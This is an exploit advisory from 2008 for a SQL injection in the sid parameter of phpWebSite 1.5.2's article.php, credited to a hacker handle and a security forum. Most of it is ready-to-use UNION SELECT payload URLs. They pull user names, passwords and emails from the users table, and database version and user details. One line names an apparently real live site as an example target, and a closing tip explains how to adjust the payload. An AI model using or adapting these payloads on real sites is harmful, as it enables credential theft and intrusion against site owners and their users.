[~]-------------------------------------------------------------------------------------------------------------
[~] phpWebSite 1.5.2 [article.php?sid] - SQL injection Vulnerability
[~]
[~] http://phpwebsite.appstate.edu/
[~]
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l   [Avram Marius]
[~]
[~] Date: 14.10.2008
[~]
[~]
[~] d3v1l@spoofer.com    http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/article.php?sid=-1 UNION SELECT
1,2,concat(name,char(58),pass,char(58),email),4,5,6,7,8 FROM users
LIMIT 1,1/*
[~]
[~] http://site.com/article.php?sid=-1 UNION SELECT
1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8/*
[~]
[~]
[~]
[~] Example :-
[~]
[~] http://ares.ema.arrl.org/article.php?sid=SQL
[~]-------------------------------------------------------------------------------------------------------------
[~] btw; on some sites need to use -> LIMIT 1,1/*  when you want to
get db information.
[~]-------------------------------------------------------------------------------------------------------------